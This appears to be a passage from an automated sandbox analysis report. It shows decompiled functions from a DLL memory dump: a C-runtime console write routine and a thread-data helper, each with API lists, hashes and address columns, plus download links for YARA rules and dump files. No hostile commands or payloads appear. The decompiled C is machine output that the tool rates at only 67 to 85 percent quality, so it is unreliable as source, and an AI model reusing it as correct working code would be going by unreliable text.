                                                                                                                                                                                                                                Function 736DDB2B, Relevance: 9.3, APIs: 6, Instructions: 319fileCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 67%
                                                                                                                                                                                                                                			E736DDB2B(void* __eflags, intOrPtr _a4, signed int _a8, signed char _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				long _v40;
				signed char _v44;
				char _v47;
				void _v48;
				intOrPtr _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed char _v80;
				signed char _v84;
				intOrPtr _v88;
				signed int _v92;
				char _v96;
				long _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				signed char _v112;
				void* _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t172;
				signed int _t174;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				long _t202;
				void* _t206;
				intOrPtr _t212;
				signed char* _t213;
				char _t216;
				signed int _t219;
				char* _t220;
				void* _t222;
				long _t228;
				intOrPtr _t229;
				char _t231;
				signed char _t235;
				signed int _t244;
				intOrPtr _t247;
				signed char _t250;
				signed int _t251;
				signed char _t253;
				struct _OVERLAPPED* _t254;
				intOrPtr _t256;
				void* _t260;
				signed char _t261;
				void* _t262;
				void* _t264;
				long _t266;
				signed int _t269;
				long _t270;
				struct _OVERLAPPED* _t271;
				signed int _t272;
				intOrPtr _t274;
				signed int _t276;
				signed int _t279;
				long _t280;
				long _t281;
				signed char _t282;
				intOrPtr _t283;
				signed int _t284;
				void* _t285;
				void* _t286;

				_t172 =  *0x736eb004; // 0xd4a5741
				_v8 = _t172 ^ _t284;
				_t174 = _a8;
				_t261 = _a12;
				_t272 = (_t174 & 0x0000003f) * 0x38;
				_t244 = _t174 >> 6;
				_v112 = _t261;
				_v84 = _t244;
				_v80 = _t272;
				_t274 = _a16 + _t261;
				_v116 =  *((intOrPtr*)(_t272 +  *((intOrPtr*)(0x736ef800 + _t244 * 4)) + 0x18));
				_v104 = _t274;
				_t178 = GetConsoleCP();
				_t242 = 0;
				_v124 = _t178;
				E736D97DC( &_v72, _t261, 0);
				asm("stosd");
				_t247 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t247;
				asm("stosd");
				asm("stosd");
				_t266 = _v112;
				_v40 = _t266;
				if(_t266 >= _t274) {
					L52:
					__eflags = _v60 - _t242;
				} else {
					_t276 = _v92;
					while(1) {
						_v47 =  *_t266;
						_v76 = _t242;
						_v44 = 1;
						_t186 =  *((intOrPtr*)(0x736ef800 + _v84 * 4));
						_v52 = _t186;
						if(_t247 != 0xfde9) {
							goto L23;
						}
						_t261 = _v80;
						_t212 = _t186 + 0x2e + _t261;
						_t254 = _t242;
						_v108 = _t212;
						while( *((intOrPtr*)(_t212 + _t254)) != _t242) {
							_t254 =  &(_t254->Internal);
							if(_t254 < 5) {
								continue;
							}
							break;
						}
						_t213 = _v40;
						_t269 = _v104 - _t213;
						_v44 = _t254;
						if(_t254 <= 0) {
							_t256 =  *((char*)(( *_t213 & 0x000000ff) + 0x736eb750)) + 1;
							_v52 = _t256;
							__eflags = _t256 - _t269;
							if(_t256 > _t269) {
								__eflags = _t269;
								if(_t269 <= 0) {
									goto L44;
								} else {
									_t280 = _v40;
									do {
										_t262 = _t242 + _t261;
										_t216 =  *((intOrPtr*)(_t242 + _t280));
										_t242 =  &(_t242->Internal);
										 *((char*)(_t262 +  *((intOrPtr*)(0x736ef800 + _v84 * 4)) + 0x2e)) = _t216;
										_t261 = _v80;
										__eflags = _t242 - _t269;
									} while (_t242 < _t269);
									goto L43;
								}
							} else {
								_t270 = _v40;
								__eflags = _t256 - 4;
								_v144 = _t242;
								_t258 =  &_v144;
								_v140 = _t242;
								_v56 = _t270;
								_t219 = (0 | _t256 == 0x00000004) + 1;
								__eflags = _t219;
								_push( &_v144);
								_v44 = _t219;
								_push(_t219);
								_t220 =  &_v56;
								goto L21;
							}
						} else {
							_t228 =  *((char*)(( *(_t261 + _v52 + 0x2e) & 0x000000ff) + 0x736eb750)) + 1;
							_v56 = _t228;
							_t229 = _t228 - _t254;
							_v52 = _t229;
							if(_t229 > _t269) {
								__eflags = _t269;
								if(_t269 > 0) {
									_t281 = _v40;
									do {
										_t264 = _t242 + _t261 + _t254;
										_t231 =  *((intOrPtr*)(_t242 + _t281));
										_t242 =  &(_t242->Internal);
										 *((char*)(_t264 +  *((intOrPtr*)(0x736ef800 + _v84 * 4)) + 0x2e)) = _t231;
										_t254 = _v44;
										_t261 = _v80;
										__eflags = _t242 - _t269;
									} while (_t242 < _t269);
									L43:
									_t276 = _v92;
								}
								L44:
								_t279 = _t276 + _t269;
								__eflags = _t279;
								L45:
								__eflags = _v60;
								_v92 = _t279;
							} else {
								_t261 = _t242;
								if(_t254 > 0) {
									_t283 = _v108;
									do {
										 *((char*)(_t284 + _t261 - 0xc)) =  *((intOrPtr*)(_t283 + _t261));
										_t261 = _t261 + 1;
									} while (_t261 < _t254);
									_t229 = _v52;
								}
								_t270 = _v40;
								if(_t229 > 0) {
									E736D82C0( &_v16 + _t254, _t270, _v52);
									_t254 = _v44;
									_t285 = _t285 + 0xc;
								}
								if(_t254 > 0) {
									_t261 = _v44;
									_t271 = _t242;
									_t282 = _v80;
									do {
										_t260 = _t271 + _t282;
										_t271 =  &(_t271->Internal);
										 *(_t260 +  *((intOrPtr*)(0x736ef800 + _v84 * 4)) + 0x2e) = _t242;
									} while (_t271 < _t261);
									_t270 = _v40;
								}
								_v136 = _t242;
								_v120 =  &_v16;
								_t258 =  &_v136;
								_v132 = _t242;
								_push( &_v136);
								_t235 = (0 | _v56 == 0x00000004) + 1;
								_v44 = _t235;
								_push(_t235);
								_t220 =  &_v120;
								L21:
								_push(_t220);
								_push( &_v76);
								_t222 = E736DE75D(_t258);
								_t286 = _t285 + 0x10;
								if(_t222 == 0xffffffff) {
									goto L52;
								} else {
									_t266 = _t270 + _v52 - 1;
									L31:
									_t266 = _t266 + 1;
									_v40 = _t266;
									_t193 = E736DB595(_v124, _t242,  &_v76, _v44,  &_v32, 5, _t242, _t242);
									_t285 = _t286 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L52;
									} else {
										if(WriteFile(_v116,  &_v32, _t193,  &_v100, _t242) == 0) {
											L51:
											_v96 = GetLastError();
											goto L52;
										} else {
											_t276 = _v88 - _v112 + _t266;
											_v92 = _t276;
											if(_v100 < _v56) {
												goto L52;
											} else {
												if(_v47 != 0xa) {
													L38:
													if(_t266 >= _v104) {
														goto L52;
													} else {
														_t247 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v48 = _t198;
													if(WriteFile(_v116,  &_v48, 1,  &_v100, _t242) == 0) {
														goto L51;
													} else {
														if(_v100 < 1) {
															goto L52;
														} else {
															_v88 = _v88 + 1;
															_t276 = _t276 + 1;
															_v92 = _t276;
															goto L38;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L53;
						L23:
						_t250 = _v80;
						_t261 =  *((intOrPtr*)(_t250 + _t186 + 0x2d));
						__eflags = _t261 & 0x00000004;
						if((_t261 & 0x00000004) == 0) {
							_v33 =  *_t266;
							_t188 = E736DC8A4(_t261);
							_t251 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t251 * 2)) - _t242;
							if( *((intOrPtr*)(_t188 + _t251 * 2)) >= _t242) {
								_push(1);
								_push(_t266);
								goto L30;
							} else {
								_t202 = _t266 + 1;
								_v56 = _t202;
								__eflags = _t202 - _v104;
								if(_t202 >= _v104) {
									_t261 = _v84;
									_t253 = _v80;
									_t242 = _v33;
									 *((char*)(_t253 +  *((intOrPtr*)(0x736ef800 + _t261 * 4)) + 0x2e)) = _v33;
									 *(_t253 +  *((intOrPtr*)(0x736ef800 + _t261 * 4)) + 0x2d) =  *(_t253 +  *((intOrPtr*)(0x736ef800 + _t261 * 4)) + 0x2d) | 0x00000004;
									_t279 = _t276 + 1;
									goto L45;
								} else {
									_t206 = E736DC771( &_v76, _t266, 2);
									_t286 = _t285 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L52;
									} else {
										_t266 = _v56;
										goto L31;
									}
								}
							}
						} else {
							_t261 = _t261 & 0x000000fb;
							_v24 =  *((intOrPtr*)(_t250 + _t186 + 0x2e));
							_v23 =  *_t266;
							_push(2);
							 *(_t250 + _v52 + 0x2d) = _t261;
							_push( &_v24);
							L30:
							_push( &_v76);
							_t190 = E736DC771();
							_t286 = _t285 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L52;
							} else {
								goto L31;
							}
						}
						goto L53;
					}
				}
				L53:
				if(__eflags != 0) {
					_t183 = _v72;
					_t167 = _t183 + 0x350;
					 *_t167 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t167;
				}
				__eflags = _v8 ^ _t284;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E736D6EA3(_a4, _t242, _v8 ^ _t284, _t261, _a4,  &_v96);
			}






















































































                                                                                                                                                                                                                                0x736ddb36
                                                                                                                                                                                                                                0x736ddb3d
                                                                                                                                                                                                                                0x736ddb40
                                                                                                                                                                                                                                0x736ddb45
                                                                                                                                                                                                                                0x736ddb4d
                                                                                                                                                                                                                                0x736ddb50
                                                                                                                                                                                                                                0x736ddb54
                                                                                                                                                                                                                                0x736ddb57
                                                                                                                                                                                                                                0x736ddb61
                                                                                                                                                                                                                                0x736ddb6b
                                                                                                                                                                                                                                0x736ddb6d
                                                                                                                                                                                                                                0x736ddb70
                                                                                                                                                                                                                                0x736ddb73
                                                                                                                                                                                                                                0x736ddb79
                                                                                                                                                                                                                                0x736ddb7b
                                                                                                                                                                                                                                0x736ddb82
                                                                                                                                                                                                                                0x736ddb8f
                                                                                                                                                                                                                                0x736ddb90
                                                                                                                                                                                                                                0x736ddb93
                                                                                                                                                                                                                                0x736ddb96
                                                                                                                                                                                                                                0x736ddb97
                                                                                                                                                                                                                                0x736ddb98
                                                                                                                                                                                                                                0x736ddb9b
                                                                                                                                                                                                                                0x736ddba0
                                                                                                                                                                                                                                0x736ddeac
                                                                                                                                                                                                                                0x736ddeac
                                                                                                                                                                                                                                0x736ddba6
                                                                                                                                                                                                                                0x736ddba6
                                                                                                                                                                                                                                0x736ddba9
                                                                                                                                                                                                                                0x736ddbab
                                                                                                                                                                                                                                0x736ddbb1
                                                                                                                                                                                                                                0x736ddbb4
                                                                                                                                                                                                                                0x736ddbbb
                                                                                                                                                                                                                                0x736ddbc2
                                                                                                                                                                                                                                0x736ddbcb
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736ddbd1
                                                                                                                                                                                                                                0x736ddbd7
                                                                                                                                                                                                                                0x736ddbd9
                                                                                                                                                                                                                                0x736ddbdb
                                                                                                                                                                                                                                0x736ddbde
                                                                                                                                                                                                                                0x736ddbe3
                                                                                                                                                                                                                                0x736ddbe7
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736ddbe7
                                                                                                                                                                                                                                0x736ddbec
                                                                                                                                                                                                                                0x736ddbef
                                                                                                                                                                                                                                0x736ddbf1
                                                                                                                                                                                                                                0x736ddbf6
                                                                                                                                                                                                                                0x736ddca8
                                                                                                                                                                                                                                0x736ddca9
                                                                                                                                                                                                                                0x736ddcac
                                                                                                                                                                                                                                0x736ddcae
                                                                                                                                                                                                                                0x736dde5c
                                                                                                                                                                                                                                0x736dde5e
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736dde60
                                                                                                                                                                                                                                0x736dde60
                                                                                                                                                                                                                                0x736dde63
                                                                                                                                                                                                                                0x736dde66
                                                                                                                                                                                                                                0x736dde6f
                                                                                                                                                                                                                                0x736dde72
                                                                                                                                                                                                                                0x736dde73
                                                                                                                                                                                                                                0x736dde77
                                                                                                                                                                                                                                0x736dde7a
                                                                                                                                                                                                                                0x736dde7a
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736dde7e
                                                                                                                                                                                                                                0x736ddcb4
                                                                                                                                                                                                                                0x736ddcb4
                                                                                                                                                                                                                                0x736ddcb9
                                                                                                                                                                                                                                0x736ddcbc
                                                                                                                                                                                                                                0x736ddcc2
                                                                                                                                                                                                                                0x736ddcc8
                                                                                                                                                                                                                                0x736ddcd1
                                                                                                                                                                                                                                0x736ddcd4
                                                                                                                                                                                                                                0x736ddcd4
                                                                                                                                                                                                                                0x736ddcd5
                                                                                                                                                                                                                                0x736ddcd6
                                                                                                                                                                                                                                0x736ddcd9
                                                                                                                                                                                                                                0x736ddcda
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736ddcda
                                                                                                                                                                                                                                0x736ddbfc
                                                                                                                                                                                                                                0x736ddc0b
                                                                                                                                                                                                                                0x736ddc0c
                                                                                                                                                                                                                                0x736ddc0f
                                                                                                                                                                                                                                0x736ddc11
                                                                                                                                                                                                                                0x736ddc16
                                                                                                                                                                                                                                0x736dde27
                                                                                                                                                                                                                                0x736dde29
                                                                                                                                                                                                                                0x736dde2b
                                                                                                                                                                                                                                0x736dde2e
                                                                                                                                                                                                                                0x736dde33
                                                                                                                                                                                                                                0x736dde3c
                                                                                                                                                                                                                                0x736dde3f
                                                                                                                                                                                                                                0x736dde40
                                                                                                                                                                                                                                0x736dde44
                                                                                                                                                                                                                                0x736dde47
                                                                                                                                                                                                                                0x736dde4a
                                                                                                                                                                                                                                0x736dde4a
                                                                                                                                                                                                                                0x736dde4e
                                                                                                                                                                                                                                0x736dde4e
                                                                                                                                                                                                                                0x736dde4e
                                                                                                                                                                                                                                0x736dde51
                                                                                                                                                                                                                                0x736dde51
                                                                                                                                                                                                                                0x736dde51
                                                                                                                                                                                                                                0x736dde53
                                                                                                                                                                                                                                0x736dde53
                                                                                                                                                                                                                                0x736dde57
                                                                                                                                                                                                                                0x736ddc1c
                                                                                                                                                                                                                                0x736ddc1c
                                                                                                                                                                                                                                0x736ddc20
                                                                                                                                                                                                                                0x736ddc22
                                                                                                                                                                                                                                0x736ddc25
                                                                                                                                                                                                                                0x736ddc28
                                                                                                                                                                                                                                0x736ddc2c
                                                                                                                                                                                                                                0x736ddc2d
                                                                                                                                                                                                                                0x736ddc31
                                                                                                                                                                                                                                0x736ddc31
                                                                                                                                                                                                                                0x736ddc34
                                                                                                                                                                                                                                0x736ddc39
                                                                                                                                                                                                                                0x736ddc45
                                                                                                                                                                                                                                0x736ddc4a
                                                                                                                                                                                                                                0x736ddc4d
                                                                                                                                                                                                                                0x736ddc4d
                                                                                                                                                                                                                                0x736ddc52
                                                                                                                                                                                                                                0x736ddc54
                                                                                                                                                                                                                                0x736ddc57
                                                                                                                                                                                                                                0x736ddc59
                                                                                                                                                                                                                                0x736ddc5c
                                                                                                                                                                                                                                0x736ddc5f
                                                                                                                                                                                                                                0x736ddc62
                                                                                                                                                                                                                                0x736ddc6a
                                                                                                                                                                                                                                0x736ddc6e
                                                                                                                                                                                                                                0x736ddc72
                                                                                                                                                                                                                                0x736ddc72
                                                                                                                                                                                                                                0x736ddc78
                                                                                                                                                                                                                                0x736ddc7e
                                                                                                                                                                                                                                0x736ddc81
                                                                                                                                                                                                                                0x736ddc89
                                                                                                                                                                                                                                0x736ddc90
                                                                                                                                                                                                                                0x736ddc94
                                                                                                                                                                                                                                0x736ddc95
                                                                                                                                                                                                                                0x736ddc98
                                                                                                                                                                                                                                0x736ddc99
                                                                                                                                                                                                                                0x736ddcdd
                                                                                                                                                                                                                                0x736ddcdd
                                                                                                                                                                                                                                0x736ddce1
                                                                                                                                                                                                                                0x736ddce2
                                                                                                                                                                                                                                0x736ddce7
                                                                                                                                                                                                                                0x736ddced
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736ddcf3
                                                                                                                                                                                                                                0x736ddcf7
                                                                                                                                                                                                                                0x736ddd80
                                                                                                                                                                                                                                0x736ddd87
                                                                                                                                                                                                                                0x736ddd8f
                                                                                                                                                                                                                                0x736ddd97
                                                                                                                                                                                                                                0x736ddd9c
                                                                                                                                                                                                                                0x736ddd9f
                                                                                                                                                                                                                                0x736ddda4
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736dddaa
                                                                                                                                                                                                                                0x736dddbf
                                                                                                                                                                                                                                0x736ddea3
                                                                                                                                                                                                                                0x736ddea9
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736dddc5
                                                                                                                                                                                                                                0x736dddce
                                                                                                                                                                                                                                0x736dddd0
                                                                                                                                                                                                                                0x736dddd6
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736ddddc
                                                                                                                                                                                                                                0x736ddde0
                                                                                                                                                                                                                                0x736dde16
                                                                                                                                                                                                                                0x736dde19
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736dde1f
                                                                                                                                                                                                                                0x736dde1f
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736dde1f
                                                                                                                                                                                                                                0x736ddde2
                                                                                                                                                                                                                                0x736ddde4
                                                                                                                                                                                                                                0x736ddde6
                                                                                                                                                                                                                                0x736dddff
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736dde05
                                                                                                                                                                                                                                0x736dde09
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736dde0f
                                                                                                                                                                                                                                0x736dde0f
                                                                                                                                                                                                                                0x736dde12
                                                                                                                                                                                                                                0x736dde13
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736dde13
                                                                                                                                                                                                                                0x736dde09
                                                                                                                                                                                                                                0x736dddff
                                                                                                                                                                                                                                0x736ddde0
                                                                                                                                                                                                                                0x736dddd6
                                                                                                                                                                                                                                0x736dddbf
                                                                                                                                                                                                                                0x736ddda4
                                                                                                                                                                                                                                0x736ddced
                                                                                                                                                                                                                                0x736ddc16
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736ddcfe
                                                                                                                                                                                                                                0x736ddcfe
                                                                                                                                                                                                                                0x736ddd01
                                                                                                                                                                                                                                0x736ddd05
                                                                                                                                                                                                                                0x736ddd08
                                                                                                                                                                                                                                0x736ddd2a
                                                                                                                                                                                                                                0x736ddd2d
                                                                                                                                                                                                                                0x736ddd32
                                                                                                                                                                                                                                0x736ddd36
                                                                                                                                                                                                                                0x736ddd3a
                                                                                                                                                                                                                                0x736ddd68
                                                                                                                                                                                                                                0x736ddd6a
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736ddd3c
                                                                                                                                                                                                                                0x736ddd3c
                                                                                                                                                                                                                                0x736ddd3f
                                                                                                                                                                                                                                0x736ddd42
                                                                                                                                                                                                                                0x736ddd45
                                                                                                                                                                                                                                0x736dde80
                                                                                                                                                                                                                                0x736dde83
                                                                                                                                                                                                                                0x736dde86
                                                                                                                                                                                                                                0x736dde90
                                                                                                                                                                                                                                0x736dde9b
                                                                                                                                                                                                                                0x736ddea0
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736ddd4b
                                                                                                                                                                                                                                0x736ddd52
                                                                                                                                                                                                                                0x736ddd57
                                                                                                                                                                                                                                0x736ddd5a
                                                                                                                                                                                                                                0x736ddd5d
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736ddd63
                                                                                                                                                                                                                                0x736ddd63
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736ddd63
                                                                                                                                                                                                                                0x736ddd5d
                                                                                                                                                                                                                                0x736ddd45
                                                                                                                                                                                                                                0x736ddd0a
                                                                                                                                                                                                                                0x736ddd0e
                                                                                                                                                                                                                                0x736ddd11
                                                                                                                                                                                                                                0x736ddd16
                                                                                                                                                                                                                                0x736ddd1c
                                                                                                                                                                                                                                0x736ddd1e
                                                                                                                                                                                                                                0x736ddd25
                                                                                                                                                                                                                                0x736ddd6b
                                                                                                                                                                                                                                0x736ddd6e
                                                                                                                                                                                                                                0x736ddd6f
                                                                                                                                                                                                                                0x736ddd74
                                                                                                                                                                                                                                0x736ddd77
                                                                                                                                                                                                                                0x736ddd7a
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736ddd7a
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736ddd08
                                                                                                                                                                                                                                0x736ddba9
                                                                                                                                                                                                                                0x736ddeaf
                                                                                                                                                                                                                                0x736ddeaf
                                                                                                                                                                                                                                0x736ddeb1
                                                                                                                                                                                                                                0x736ddeb4
                                                                                                                                                                                                                                0x736ddeb4
                                                                                                                                                                                                                                0x736ddeb4
                                                                                                                                                                                                                                0x736ddeb4
                                                                                                                                                                                                                                0x736ddec6
                                                                                                                                                                                                                                0x736ddec8
                                                                                                                                                                                                                                0x736ddec9
                                                                                                                                                                                                                                0x736ddeca
                                                                                                                                                                                                                                0x736dded6

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetConsoleCP.KERNEL32(00000000,00000001,00000000), ref: 736DDB73
                                                                                                                                                                                                                                • __fassign.LIBCMT ref: 736DDD52
                                                                                                                                                                                                                                • __fassign.LIBCMT ref: 736DDD6F
                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,736DC31E,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 736DDDB7
                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 736DDDF7
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 736DDEA3
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4031098158-0
                                                                                                                                                                                                                                • Opcode ID: 69f75a8ef814a51c41fe9b03306741acfb950da0c224c19a53e6fe6e68daeb38
                                                                                                                                                                                                                                • Instruction ID: 478704e6cb27ff5b10fd0181870b68765d82861f3ddcd779b127fcb5b8cdcf05
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 69f75a8ef814a51c41fe9b03306741acfb950da0c224c19a53e6fe6e68daeb38
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A4D1CE76D112989FDF11DFE8C980AEDBBB5FF49310F28015AE956BB281D730A906CB50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736D8137, Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 85%
                                                                                                                                                                                                                                			E736D8137(void* __ecx) {
				void* _t4;
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x736eb020 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E736D898D(_t13, __eflags,  *0x736eb020);
					_t14 = _t23;
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E736D89C8(_t14, __eflags,  *0x736eb020, 0xffffffff);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_t27 = E736D9908();
								_t18 = 1;
								__eflags = _t27;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E736D89C8(_t18, __eflags,  *0x736eb020, 0);
								} else {
									_t8 = E736D89C8(_t18, __eflags,  *0x736eb020, _t27);
									_pop(_t18);
									__eflags = _t8;
									if(__eflags != 0) {
										_t11 = _t27;
										_t27 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E736D9721(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}












                                                                                                                                                                                                                                0x736d8137
                                                                                                                                                                                                                                0x736d813e
                                                                                                                                                                                                                                0x736d8151
                                                                                                                                                                                                                                0x736d8158
                                                                                                                                                                                                                                0x736d815a
                                                                                                                                                                                                                                0x736d815b
                                                                                                                                                                                                                                0x736d815e
                                                                                                                                                                                                                                0x736d8177
                                                                                                                                                                                                                                0x736d8177
                                                                                                                                                                                                                                0x736d8160
                                                                                                                                                                                                                                0x736d8160
                                                                                                                                                                                                                                0x736d8162
                                                                                                                                                                                                                                0x736d816c
                                                                                                                                                                                                                                0x736d8173
                                                                                                                                                                                                                                0x736d8175
                                                                                                                                                                                                                                0x736d817c
                                                                                                                                                                                                                                0x736d8185
                                                                                                                                                                                                                                0x736d8188
                                                                                                                                                                                                                                0x736d8189
                                                                                                                                                                                                                                0x736d818b
                                                                                                                                                                                                                                0x736d819f
                                                                                                                                                                                                                                0x736d819f
                                                                                                                                                                                                                                0x736d81a8
                                                                                                                                                                                                                                0x736d818d
                                                                                                                                                                                                                                0x736d8194
                                                                                                                                                                                                                                0x736d819a
                                                                                                                                                                                                                                0x736d819b
                                                                                                                                                                                                                                0x736d819d
                                                                                                                                                                                                                                0x736d81b1
                                                                                                                                                                                                                                0x736d81b3
                                                                                                                                                                                                                                0x736d81b3
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d819d
                                                                                                                                                                                                                                0x736d81b6
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d8175
                                                                                                                                                                                                                                0x736d8162
                                                                                                                                                                                                                                0x736d81be
                                                                                                                                                                                                                                0x736d81c8
                                                                                                                                                                                                                                0x736d8140
                                                                                                                                                                                                                                0x736d8142
                                                                                                                                                                                                                                0x736d8142

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000001,?,736D7CA5,736D74C3,736D6EDC,?,736D7114,?,00000001,?,?,00000001,?,736E9A30,0000000C,736D720D), ref: 736D8145
                                                                                                                                                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 736D8153
                                                                                                                                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 736D816C
                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,736D7114,?,00000001,?,?,00000001,?,736E9A30,0000000C,736D720D,?,00000001,?), ref: 736D81BE
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3852720340-0
                                                                                                                                                                                                                                • Opcode ID: ceb11d6aafd2f52919b6237827f5b6992150b922f7a36233ceca5df0772ae9e2
                                                                                                                                                                                                                                • Instruction ID: 02efab8df2a6382d2f725095310dc715f54188fb4d11c6f5fdecb592459af44e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ceb11d6aafd2f52919b6237827f5b6992150b922f7a36233ceca5df0772ae9e2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4301283366C3175EFB052676AC8CB5A2FA8EB05E713300329E129961D5FF22180D5144
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736DAB09, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                Download Yara Rule
